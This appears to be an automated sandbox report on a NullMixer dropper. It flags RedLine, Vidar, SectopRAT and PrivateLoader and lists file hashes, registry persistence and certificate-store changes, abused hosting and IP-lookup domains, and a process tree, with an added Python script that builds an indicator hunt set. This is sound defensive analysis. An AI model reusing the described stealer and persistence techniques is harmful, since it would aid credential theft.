memory/2656-223-0x0000000006480000-0x00000000064B2000-memory.dmp
memory/2656-224-0x0000000073EB0000-0x0000000073EFC000-memory.dmp
memory/2656-234-0x00000000064C0000-0x00000000064DE000-memory.dmp
memory/2656-235-0x00000000070C0000-0x0000000007163000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e443ee4336fcf13c698b8ab5f3c173d0 |
| SHA1 | 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a |
| SHA256 | 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b |
| SHA512 | cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd |
memory/2656-242-0x0000000007820000-0x0000000007E9A000-memory.dmp
memory/2656-243-0x00000000071E0000-0x00000000071FA000-memory.dmp
memory/2656-244-0x0000000007250000-0x000000000725A000-memory.dmp
memory/2656-250-0x0000000007460000-0x00000000074F6000-memory.dmp
\??\pipe\LOCAL\crashpad_4092_YTVGSEXPLPVIISPH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56a4f78e21616a6e19da57228569489b |
| SHA1 | 21bfabbfc294d5f2aa1da825c5590d760483bc76 |
| SHA256 | d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb |
| SHA512 | c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2e613877ba30067611bb2c2e1e8c02eb |
| SHA1 | 3e5528270361b8c0e22a97e80db1da62a4a1a469 |
| SHA256 | b23176c536f1299706fe85369e026a879fcf98bf8fc8381be77dec95c6605a6b |
| SHA512 | 849c3e758963994ebe001e10aba8662022a0be15596180772f21c060936f118c4e46f86f62ab7f0f780111e9fc1516925144bb9d5de72490f849bd4de6d9b872 |
memory/2656-262-0x00000000073E0000-0x00000000073F1000-memory.dmp
memory/2656-263-0x0000000007410000-0x000000000741E000-memory.dmp
memory/2656-264-0x0000000007420000-0x0000000007434000-memory.dmp
memory/2656-265-0x0000000007520000-0x000000000753A000-memory.dmp
memory/2656-266-0x0000000007500000-0x0000000007508000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | acb4fa771a71663077ce1b9eac1bab3a |
| SHA1 | 797008a96ec3e23ec74289d49ae9120028045070 |
| SHA256 | 366c2581a3ce28374993d73565640180a949078578d9b9b895dffdcb218f979e |
| SHA512 | 15100fe991300e962749bb2c7d41106963c00c6cf0b1488efb4f4e14edeb3744422e19399a83200fe94b7953f5297f9c44fa92b1ad1070b57bd7a6bce45dcb32 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9ab891abd4504574742cc01b982add54 |
| SHA1 | 45f1cb1d9a537e94662093e7b5f55c16fd6b2bf2 |
| SHA256 | 1c3c8c2a8c254349999ef71657ae94efdbabf12f2a31ac29bd0b45f55e1b9242 |
| SHA512 | 9d0b46a56dfb4f0538ffa04e3e08a567c426e2408f0123e93a77b44f9761042f2c4b72495add71240840d52bd6ade7699fa1a72f4f2e2a07bc24fb854908a979 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | be0b4b1c809dc419f44b990378cbae31 |
| SHA1 | 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806 |
| SHA256 | 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53 |
| SHA512 | 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24 |
memory/5444-315-0x0000000000140000-0x0000000000146000-memory.dmp
memory/5580-318-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-319-0x0000000000890000-0x00000000008B0000-memory.dmp
memory/5580-317-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-321-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-325-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-324-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-323-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-322-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-326-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-327-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-347-0x0000000140000000-0x0000000140786000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4bc8a3540a546cfe044e0ed1a0a22a95 |
| SHA1 | 5387f78f1816dee5393bfca1fffe49cede5f59c1 |
| SHA256 | f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca |
| SHA512 | e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf |
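Not every record in the "Files" list above is a dropped payload. The Edge `User Data` entries are the guest's own browser writing its profile, the `CLR_v4.0_32\UsageLogs\1cr.exe.log` entry is the .NET runtime noting that `1cr.exe` ran, the `__PSScriptPolicyTest_*.ps1` file is written by powershell.exe itself when it starts, and the `\??\pipe\LOCAL\crashpad_*` entry is a named pipe whose hashes (`d41d8cd9...`, `e3b0c442...`) are those of zero bytes, which would match every empty file on every host. Two paths also appear twice with different hashes, so the file was rewritten during the run and is a path-level indicator rather than a hash-level one. The script below is an added example, not part of the report, that parses these records, drops that noise, and produces a SHA-256 hunt set plus the list of rewritten paths. The classification rules and the records copied into `SAMPLE_FILES` as constructed input are the example's own assumptions.

```python
import re
from collections import defaultdict

# SHA-256 of zero bytes. A hash list containing it matches every empty file.
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"

HASH_LINE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
EXECUTABLE_EXT = (".exe", ".dll", ".cmd", ".bat", ".ps1", ".vbs", ".js")

# Constructed sample: a subset of the "Files" records above, copied verbatim.
SAMPLE_FILES = r"""
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libwinpthread-1.dll
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
memory/3016-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4xfsz0p.s1q.ps1
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| SHA256 | 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b |
\??\pipe\LOCAL\crashpad_4092_YTVGSEXPLPVIISPH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| SHA256 | d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| SHA256 | 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53 |
"""


def parse_files(text):
    """Return [{"path", "hashes"}] records; memory dump names are not disk files."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("memory/"):
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            current["hashes"][m.group(1).lower()] = m.group(2).lower()
        elif not m:
            current = {"path": line, "hashes": {}}
            records.append(current)
    return records


def classify_path(path):
    """(kind, location) for one record; the rules are this example's assumptions."""
    low = path.lower()
    name = low.rsplit("\\", 1)[-1]
    if low.startswith("\\??\\pipe\\"):
        kind = "named_pipe"                 # an object, not a file on disk
    elif "\\microsoft\\edge\\user data\\" in low:
        kind = "browser_profile_noise"      # the guest's own browser writing its profile
    elif "\\clr_v4.0" in low and low.endswith(".log"):
        kind = "clr_usage_log"              # evidence a .NET binary ran; not a payload
    elif name.startswith("__psscriptpolicytest_"):
        kind = "powershell_policy_probe"    # written by powershell.exe itself on start
    elif low.endswith(EXECUTABLE_EXT):
        kind = "dropped_executable"
    else:
        kind = "other"
    if low.startswith("c:\\windows\\"):
        location = "system_dir"             # user-dropped file beside system binaries
    elif "\\appdata\\roaming\\" in low:
        location = "roaming_appdata"
    elif "\\appdata\\local\\temp\\" in low:
        location = "temp"
    else:
        location = "other"
    return kind, location


def build_hunt_set(records):
    """SHA-256 set for hunting plus per-path findings, with noise dropped."""
    hunt, findings, by_path = set(), [], defaultdict(set)
    for rec in records:
        kind, location = classify_path(rec["path"])
        sha = rec["hashes"].get("sha256")
        if sha:
            by_path[rec["path"]].add(sha)
        findings.append((rec["path"], kind, location))
        if kind == "dropped_executable" and sha and sha != EMPTY_SHA256:
            hunt.add(sha)
    # Same path, different content: the file was rewritten during the run, so
    # hunt on the path, not on any single hash.
    rewritten = sorted(p for p, s in by_path.items() if len(s) > 1)
    return {"hunt": hunt, "findings": findings, "rewritten": rewritten}


if __name__ == "__main__":
    result = build_hunt_set(parse_files(SAMPLE_FILES))
    for path, kind, location in result["findings"]:
        print(f"{kind:24} {location:16} {path}")
    print(len(result["hunt"]), "hashes to hunt;", result["rewritten"], "rewritten")
```

The location column is the part worth acting on beyond the hashes: `C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe` is a user-writable path dressed up to look like a system component, and `C:\Windows\winnetdriv.exe` (from the "Drops file in Windows directory" signature) sits in the Windows root rather than in System32, so both can be hunted by path regardless of what hash the next build carries.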
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-06 12:12
Reported
2024-12-06 12:15
Platform
win7-20240903-en
Max time kernel
56s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1912 set thread context of 1360 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7C7DF041-B3CB-11EF-9C44-E61828AB23DD} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Image | Command line |
| C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe | "C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe" |
| C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe" |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe | "C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\setup_install.exe" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c caa4baaf544.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 621c13b77.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe | 09b9624c6ac9.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\caa4baaf544.exe | caa4baaf544.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\6f1aa71747b4a291.exe | 6f1aa71747b4a291.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe | e4f0738cc5646a38.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\3d1f9c2a6.exe | 3d1f9c2a6.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\d55cc0d45c3a05.exe | d55cc0d45c3a05.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe | "C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\09b9624c6ac9.exe" -a |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\c0f099be1ace2.exe | c0f099be1ace2.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\24ebc9ce784c63.exe | 24ebc9ce784c63.exe |
| C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\621c13b77.exe | 621c13b77.exe |
| C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| C:\Users\Admin\AppData\Local\Temp\chrome2.exe | "C:\Users\Admin\AppData\Local\Temp\chrome2.exe" |
